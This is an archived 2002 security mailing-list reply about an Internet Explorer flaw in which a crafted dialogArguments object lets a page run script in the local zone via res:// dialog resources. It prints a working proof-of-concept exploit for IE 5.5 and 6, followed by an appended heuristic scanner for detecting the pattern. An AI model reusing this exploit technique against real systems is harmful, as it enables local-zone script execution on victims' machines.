RE: (MSIE) -"dialogArguments" (extended)

From: GreyMagic Software (securityat_private)
Date: Wed Nov 20 2002 - 00:55:17 PST


>IFRAME in a page opened by "openModalDialog" has "dialogArguments" of its
>parent.

The method is "showModalDialog" and not "openModalDialog". It's worth noting
that "showModelessDialog" is also vulnerable.
    
>/*note: please tell me if "MSIE SP1" allows an internet page to contain an
>iframe with local content*/
    
Normally, it doesn't. But it seems like Microsoft applied that rule to
normal windows and forgot to do the same for dialogs.

>in the demo:
>(*)"victim zone" is localzone;
>(*)the page from victim zone is "res://shdoclc.dll/privacypolicy.dlg"; it
>uses "cookieUrl" without filtering.

This vulnerability is very similar to the redirect vulnerability in dialogs
presented by Thor Larholm back in March and it has the same impact. But just
like Larholm's initial advisory was confined to IE 6, Liu's is confined to
IE 6 as well. This is a result of using "privacypolicy.dlg" for
exploitation, which was not shipped prior to version 6.

However, IE 5.5 is also vulnerable, and can be exploited by using the
"analyze.dlg" resource, which we published immediately after Thor's advisory
at the time.

Notice that IE 5.0 is not vulnerable to this flaw at all. It seems like many
of the recent IE vulnerabilities emerge from the global change made to
windows (including frames and iframes) in IE 5.5.

The following proof-of-concept code will work on both (fully patched) IE 5.5
and IE 6:
    
/*
Online demonstration at
http://security.greymagic.com/misc/globalDgArg/
*/

// Stands in for the collection the dialog reads from document.all.tags("link"):
// a single fake <link> entry whose href carries sHTML.
function oExploit(iSec) {
	return {
		rel:"stylesheet",
		readyState:"exploit",
		href:sHTML
	};
}
oExploit.length=1;

// "\i" is just "i" inside a JS string literal; it keeps the literal from being
// read as a closing script tag by the HTML parser.
var sHTML="<scr\ipt defer>alert(location.href)</scr\ipt>",
	// Fake window object; the dialog receives it as its dialogArguments.
	oSecurity={
		document:{
			all:{
				tags:function (sTag) {
					return sTag=="link" ? oExploit : [];
				}
			}
		}
	};

// base.html contains <iframe src="res://shdoclc.dll/analyze.dlg"></iframe>
showModalDialog("base.html",oSecurity);
    
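The post combines two ingredients: a page that loads a res:// (local-zone) resource in an iframe, and a showModalDialog/showModelessDialog call that hands that page a crafted dialogArguments object. The following scanner, added here as an example and not code from the original post or from GreyMagic, is a heuristic check a content filter or code reviewer could run over captured HTML to flag pages carrying those ingredients. The function names, risk levels and sample pages are constructed for this example; the regexes are deliberately simple and will miss obfuscated variants.

```javascript
// Added example (not from the original post): heuristic scanner for the two
// ingredients described in the advisory. All names and sample input below are
// constructed for illustration.

// <iframe ... src="res://..."> : local-zone content embedded in a page.
const IFRAME_RE = /<iframe\b[^>]*\bsrc\s*=\s*["']?(res:\/\/[^"'\s>]+)/gi;
// showModalDialog(url, args) / showModelessDialog(url, args) calls.
const DIALOG_RE = /\b(showModalDialog|showModelessDialog)\s*\(([^)]*)\)/gi;

// Returns a list of findings for one page; each finding has a kind and detail.
function scanPage(html) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    findings.push({ kind: "res-iframe", detail: m[1] });
  }
  for (const m of html.matchAll(DIALOG_RE)) {
    // Crude argument count: the PoC passes ("base.html", oSecurity), i.e. two.
    const argc = m[2].split(",").map(s => s.trim()).filter(Boolean).length;
    findings.push({ kind: "dialog-call", detail: m[1], passesArgs: argc >= 2 });
  }
  return findings;
}

// Rates a set of pages (e.g. all documents of one capture). The technique in the
// post needs both a res:// iframe and a dialog call that passes arguments, so
// only their combination is rated "high".
function rateRisk(pages) {
  const all = pages.flatMap(scanPage);
  const hasResIframe = all.some(f => f.kind === "res-iframe");
  const hasDialogWithArgs = all.some(f => f.kind === "dialog-call" && f.passesArgs);
  if (hasResIframe && hasDialogWithArgs) return "high";
  if (hasResIframe || hasDialogWithArgs) return "medium";
  return "none";
}

// Constructed sample pages shaped like the two halves described in the post.
const SAMPLE_LAUNCHER = '<script>showModalDialog("base.html", oSecurity);</script>';
const SAMPLE_BASE = '<html><body><iframe src="res://shdoclc.dll/analyze.dlg"></iframe></body></html>';
const SAMPLE_BENIGN = '<html><body><iframe src="https://example.test/widget"></iframe></body></html>';

console.log(scanPage(SAMPLE_BASE));
console.log(rateRisk([SAMPLE_LAUNCHER, SAMPLE_BASE])); // high
console.log(rateRisk([SAMPLE_BENIGN]));                // none
```

Rating the combination rather than either part alone keeps the noise down: a res:// iframe by itself appears in legitimate IE-era intranet pages, and dialog calls with arguments are common, so a filter that blocked either alone would break benign content.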

This archive was generated by hypermail 2b30 : Sat Nov 23 2002 - 19:29:49 PST